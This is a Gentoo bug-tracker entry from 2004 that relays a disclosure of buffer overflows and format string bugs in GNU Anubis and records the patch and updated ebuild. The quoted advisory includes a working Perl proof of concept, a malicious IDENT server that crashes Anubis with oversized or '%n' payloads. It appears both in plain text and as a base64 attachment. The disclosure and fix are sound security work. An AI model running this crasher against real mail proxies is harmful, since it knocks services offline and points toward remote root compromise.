43764 – GNU Anubis buffer overflows and format string bugs

Bug 43764 - GNU Anubis buffer overflows and format string bugs

Summary: GNU Anubis buffer overflows and format string bugs

Status:	RESOLVED FIXED

Alias:	None

Product:	Gentoo Security
Classification:	Unclassified
Component:	Vulnerabilities (show other bugs)
Hardware:	All Linux

Importance:	High normal
Assignee:	Gentoo Security

URL:
Whiteboard:
Keywords:

Depends on:
Blocks:

Reported:	2004-03-04 18:48 UTC by Dave Monnier
Modified:	2011-10-30 22:40 UTC (History)
CC List:	0 users

See Also:
Package list:
Runtime testing required:	---

Attachments
anubis-3.6.2 patch (anubis-3.6.2-securityfixes.patch,3.97 KB, application/octet-stream) 2004-03-04 18:52 UTC, Dave Monnier	no flags	Details
ebuild patch to resolve the vulnerability. (anubis-3.6.2-r1.ebuild-patch,364 bytes, patch) 2004-03-11 22:55 UTC, Dave Monnier	no flags	Details \| Diff
View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Dave Monnier 2004-03-04 18:48:42 UTC

Message-Id: <1078427980.4047814c1dfe5@webmail.uu.se>
Date: Thu,  4 Mar 2004 20:19:40 +0100
From: Ulf =?iso-8859-1?b?SORybmhhbW1hcg==?= <Ulf.Harnhammar.9485@student.uu.se>
Reply-To: ulf.harnhammar.9485@student.uu.se
To: bugtraq@securityfocus.com
Cc: full-disclosure@lists.netsys.com
Subject: GNU Anubis buffer overflows and format string bugs
Mime-Version: 1.0
Content-Type: multipart/mixed;
  boundary="-MOQ1078427979a860bcf4bfdea716514571254e9995fd"
User-Agent: Internet Messaging Program (IMP) 3.2.1

---MOQ1078427979a860bcf4bfdea716514571254e9995fd
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: quoted-printable
Subject: 

GNU Anubis buffer overflows and format string bugs

PROGRAM: GNU Anubis
VENDOR: Free Software Foundation, Inc.
HOMEPAGE: http://www.gnu.org/software/anubis/
VULNERABLE VERSIONS: 3.6.2, 3.9.93, 3.9.92, 3.6.0, 3.6.1,
                     possibly others
IMMUNE VERSIONS: 3.6.2 with vendor patch, 3.9.93 with vendor patch,
                 latest CVS
REFERENCES: not yet

* DESCRIPTION *

"GNU Anubis is an outgoing mail processor. It goes between the MUA
(Mail User Agent) and the MTA (Mail Transport Agent), and can perform
various sorts of processing and conversion on-the-fly in accordance
with the sender's specified rules, based on a highly configurable
regular expressions system. It operates as a proxy server, and can
edit outgoing mail headers, encrypt or sign mail with the GnuPG,
build secure SMTP tunnels using the TLS/SSL encryption even if your
mail user agent doesn't support it, or tunnel a connection through
a SOCKS proxy server."

(quoted from freshmeat.net)

* SUMMARY *

I have found two buffer overflows and three format string bugs
in GNU Anubis. They can all be remotely exploited, potentially to
get root access, as GNU Anubis usually runs as root and drops its
privileges after executing some of the vulnerable functions.

* TECHNICAL DETAILS *

a) There are two buffer overflows in the function auth_ident()
in auth.c. The overflows are caused by sscanf() format strings of
the type "%s" instead of "%63s".

b) There are format string bugs in three instances of the syslog()
call. They are located in the function info() in log.c, the
function anubis_error() in errs.c and the function ssl_error()
in ssl.c. The vulnerable functions take strings partially made up
of user-supplied data, and use them as the format string instead
of using them as parameters ('syslog(priority, string);' instead
of 'syslog(priority, "%s", string);'). These format string bugs
become a bigger problem if you set termlevel to VERBOSE or DEBUG,
as GNU Anubis then will log more data with the syslog() facility.

* SOLUTION *

The vendor has released official security patches for 3.6.2 and
3.9.93. They can be downloaded from the program's homepage. They
correct both the buffer overflows and the format string bugs.

* MALICIOUS IDENT SERVER *

One of the methods of attacking GNU Anubis is through IDENT data,
as it always connects to the client's IDENT server to get more
information about the client. I wrote a simple malicious IDENT
server in Perl. It crashes the current instance of GNU Anubis, either
by using the buffer overflows or by using the format string bugs.
Here it is:

#!/usr/bin/perl --

# anubis-crasher
# Ulf Harnhammar 2004
# I hereby place this program in the Public Domain.

use IO::Socket;

sub usage()
{
  die "usage: $0 type\n".
      "type is 'a' (buffer overflow) or 'b' (format string bug).\n";
} # sub usage

$port =3D 113;

usage() unless @ARGV =3D=3D 1;
$type =3D shift;
usage() unless $type =3D~ m|^[ab]$|;

$send{'a'} =3D 'U' x 400;
$send{'b'} =3D '%n' x 28;
$sendstr =3D $send{$type};

$server =3D IO::Socket::INET->new(Proto =3D> 'tcp',
                                LocalPort =3D> $port,
                                Listen =3D> SOMAXCONN,
                                Reuse =3D> 1) or
          die "can't create server: $!";

while ($client =3D $server->accept())
{
  $client->autoflush(1);
  print "got a connection\n";

  $input =3D <$client>;
  $input =3D~ tr/\015\012//d;
  print "client said $input\n";

#  $wait =3D <STDIN>;
#  $wait =3D 'be quiet, perl -wc';

  $output =3D "a: USERID: a:$sendstr";
  print $client "$output\n";
  print "I said $output\n";

  close $client;
  print "disconnected\n";
} # while client=3Dserver->accept

__END__

* 31337 IRC KIDDIES *

K: "w0w d00d m0r3 buphph3r 0v3rphl0wzZz 4nd ph0rm4t zZztr1ngzZz!!1!
but why d0 y4 p0zZzt 4b0ut th4t xss ph1lt3r??+??+? w3 1n 'h4ck3rzZz
phr0m h3ll' r n0t 4muzZz3d!! xss 1zZzn't r34lly 4 vuln3r4b1l1ty
c0z 1t'zZz 34zZzy t0 3xpl01t th4t vuln3r4b1l1ty 4nd th3n u c4n't
pr00v3 h0w 31337 u r!!! th3 n31ghb0ur'zZz d4ught3r 1zZz r34lly
cut3 4nd 1ph 1 ph1nd l0tzZz 0ph buphph3r 0v3rphl0wzZz zZzh3'll b3
1mpr3zZzZzZ3d 4nd g0 t0 th3 m0v13zZz w1th m3 but th4t w0n't h4pp3n
1ph 1 ph1nd xss h0l3zZz!!!!11!!!1!!11!!!!"

U: "Virgin."

(Anyone on IRC who doesn't behave like K here is of course OK.)

// Ulf Harnhammar
   kses - 31337 PHP HTML/XHTML filter (no XSS)
   http://sourceforge.net/projects/kses

---MOQ1078427979a860bcf4bfdea716514571254e9995fd
Content-Type: application/octet-stream; name="anubis-crasher.pl"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="anubis-crasher.pl"

IyEvdXNyL2Jpbi9wZXJsIC0tCgojIGFudWJpcy1jcmFzaGVyCiMgVWxmIEhhcm5oYW1tYXIgMjAw
NAojIEkgaGVyZWJ5IHBsYWNlIHRoaXMgcHJvZ3JhbSBpbiB0aGUgUHVibGljIERvbWFpbi4KCnVz
ZSBJTzo6U29ja2V0OwoKCnN1YiB1c2FnZSgpCnsKICBkaWUgInVzYWdlOiAkMCB0eXBlXG4iLgog
ICAgICAidHlwZSBpcyAnYScgKGJ1ZmZlciBvdmVyZmxvdykgb3IgJ2InIChmb3JtYXQgc3RyaW5n
IGJ1ZykuXG4iOwp9ICMgc3ViIHVzYWdlCgoKJHBvcnQgPSAxMTM7Cgp1c2FnZSgpIHVubGVzcyBA
QVJHViA9PSAxOwokdHlwZSA9IHNoaWZ0Owp1c2FnZSgpIHVubGVzcyAkdHlwZSA9fiBtfF5bYWJd
JHw7Cgokc2VuZHsnYSd9ID0gJ1UnIHggNDAwOwokc2VuZHsnYid9ID0gJyVuJyB4IDI4Owokc2Vu
ZHN0ciA9ICRzZW5keyR0eXBlfTsKCiRzZXJ2ZXIgPSBJTzo6U29ja2V0OjpJTkVULT5uZXcoUHJv
dG8gPT4gJ3RjcCcsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTG9jYWxQb3J0ID0+
ICRwb3J0LAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIExpc3RlbiA9PiBTT01BWENP
Tk4sCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmV1c2UgPT4gMSkgb3IKICAgICAg
ICAgIGRpZSAiY2FuJ3QgY3JlYXRlIHNlcnZlcjogJCEiOwoKd2hpbGUgKCRjbGllbnQgPSAkc2Vy
dmVyLT5hY2NlcHQoKSkKewogICRjbGllbnQtPmF1dG9mbHVzaCgxKTsKICBwcmludCAiZ290IGEg
Y29ubmVjdGlvblxuIjsKCiAgJGlucHV0ID0gPCRjbGllbnQ+OwogICRpbnB1dCA9fiB0ci9cMDE1
XDAxMi8vZDsKICBwcmludCAiY2xpZW50IHNhaWQgJGlucHV0XG4iOwoKIyAgJHdhaXQgPSA8U1RE
SU4+OwojICAkd2FpdCA9ICdiZSBxdWlldCwgcGVybCAtd2MnOwoKICAkb3V0cHV0ID0gImE6IFVT
RVJJRDogYTokc2VuZHN0ciI7CiAgcHJpbnQgJGNsaWVudCAiJG91dHB1dFxuIjsKICBwcmludCAi
SSBzYWlkICRvdXRwdXRcbiI7CgogIGNsb3NlICRjbGllbnQ7CiAgcHJpbnQgImRpc2Nvbm5lY3Rl
ZFxuIjsKfSAjIHdoaWxlIGNsaWVudD1zZXJ2ZXItPmFjY2VwdAoKX19FTkRfXwo=

---MOQ1078427979a860bcf4bfdea716514571254e9995fd--

Reproducible: Always
Steps to Reproduce:
1.
2.
3.

A patch is mentioned in the advisory, will get it added here.

Comment 1 Dave Monnier 2004-03-04 18:52:27 UTC

Created attachment 26872 [details]
anubis-3.6.2 patch

http://savannah.gnu.org/patch/?func=detailitem&item_id=2699

Comment 2 Dave Monnier 2004-03-10 10:56:35 UTC

Remote exploit published.

http://www.securityfocus.com/archive/1/356928

If there's no one maintaining this I'll get the ebuild updated as soon as I can.

-Dave

Comment 3 Dave Monnier 2004-03-11 22:55:51 UTC

Created attachment 27231 [details, diff]
ebuild patch to resolve the vulnerability.

--- /usr/portage/net-mail/anubis/anubis-3.6.2.ebuild	2003-09-05
04:08:59.0000
00000 -0500
+++ /usr/local/portage/net-mail/anubis/anubis-3.6.2.ebuild	2004-03-12
01:34
:08.894638904 -0500
@@ -19,6 +19,12 @@

 S=${WORKDIR}/${P}

+src_unpack() {
+	 unpack ${P}.tar.gz
+
+	 epatch ${FILESDIR}/${P}-securityfixes.patch
+}
+
 src_compile() {
	local myconf

Comment 4 Dave Monnier 2004-03-13 09:38:18 UTC

anubis-3.6.2-r1.ebuild
======================

DESCRIPTION="GNU Anubis is an outgoing mail processor."
HOMEPAGE="http://www.gnu.org/software/anubis/"
SRC_URI="mirror://gnu/anubis/${P}.tar.gz"
LICENSE="GPL-2"

SLOT="0"
KEYWORDS="x86"
IUSE="ssl pam tcpd crypt"

DEPEND="crypt? ( >=app-crypt/gpgme-0.3.13 )
        ssl?   ( >=dev-libs/openssl-0.9.6 )
        pam?   ( >=sys-libs/pam-0.75 )
        tcpd?  ( >=sys-apps/tcp-wrappers-7.6 )
                 >=dev-libs/libpcre-3.9"

S=${WORKDIR}/${P}

src_unpack() {
        unpack ${P}.tar.gz

        epatch ${FILESDIR}/${P}-securityfixes.patch
}

src_compile() {
        local myconf

        myconf="--with-pcre"

        use crypt || myconf="${myconf} --without-gpgme"
        use ssl  && myconf="${myconf} --with-openssl"
        use pam  && myconf="${myconf} --with-pam"
        use tcpd && myconf="${myconf} --with-tcp-wrappers"

        ./configure ${myconf} --prefix=/usr --host=${CHOST} || die
        emake || die
}

src_install() {
        einstall
}

Comment 5 Lisa Seelye (RETIRED) gentoo-dev

2004-03-15 18:35:27 UTC

Fixed in cvs as 3.6.2-r1. blame cshields for breakage.